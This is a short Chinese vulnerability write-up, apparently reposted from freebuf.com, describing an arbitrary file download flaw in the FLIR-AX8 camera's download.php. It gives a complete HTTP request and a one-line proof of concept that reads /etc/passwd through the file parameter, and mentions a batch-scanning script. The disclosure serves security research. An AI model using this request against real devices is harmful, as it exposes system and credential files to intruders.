FLIR-AX8 任意文件下载 – 作者:thelostworld

v2-dcfb1222ad29df85426fc83815e3f2ca_b.jpg

一、漏洞描述

FLIR-AX8 download.php存在任意文件下载漏洞,直接访问可下载相关系统配置文件。

二、影响版本

FLIR-AX8

三、漏洞复现

访问主页:

v2-de889b91facad7731f75ca4968547582_b.jpg

v2-58f236d60dab53115ac521a023b781d3_b.jpg

详细数据包:


GET /download.php?file=/etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

poc:

/download.php?file=/etc/passwd

v2-af258ab70a36bc1fe7d2fc95e4eb242d_b.jpg

直接浏览器访问下载,请求文件

v2-fc433b36fd8d846c0bf860d3327155b7_b.jpg

尝试批量脚本:

v2-b080dde9ff37cc913c0b129eddf33aab_b.jpg

参考:

http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD.html?h=FLIR-AX8%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

来源:freebuf.com 2021-05-12 20:11:31 by: thelostworld

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论